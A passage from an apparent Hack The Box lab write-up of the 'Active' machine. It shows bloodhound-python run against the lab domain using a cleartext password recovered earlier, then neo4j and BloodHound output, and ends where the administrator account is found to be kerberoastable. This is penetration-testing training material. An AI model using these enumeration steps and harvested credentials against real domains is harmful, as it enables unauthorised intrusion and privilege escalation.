Bloodhound
If ldapdomaindump is consider to be a birdeye view over the target domain, bloodhound is like the war room table with strategies and tactics
┌──(kali㉿kali)-[~/…/htb/labs/active/bloodhound]
└─$ bloodhound-python -u SVC_TGS@active.htb -p GPPstillStandingStrong2k18 -ns $IP -d ACTIVE.HTB -dc dc.active.htb --zip -c All
INFO: Found AD domain: active.htb
INFO: Connecting to LDAP server: dc.active.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.active.htb
INFO: Found 5 users
INFO: Found 41 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.active.htb
INFO: Done in 00M 06S
INFO: Compressing output into 20230131114114_bloodhound.zipbloodhound-python is a python implementation of the bloodhound ingestor, which allows the operation remotely. I can do so with the credential extracted earlier Ingestion complete
┌──(kali㉿kali)-[~/archive/htb/labs/active]
└─$ sudo neo4j console
[sudo] password for kali:
Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /usr/share/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /usr/share/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /usr/share/neo4j/run
Starting Neo4j.
2023-01-31 10:41:33.195+0000 INFO Starting...
┌──(kali㉿kali)-[~/archive/htb/labs/active]
└─$ bloodhoundFiring up neo4j and Bloodhound
Ingested data has been uploaded
According to Bloodhound, the administrator user is kerberoast-able.
The krbtgt is by default kerberoast-able and disabled as it is the KDC.
But the administrator user? This is very much an unusual case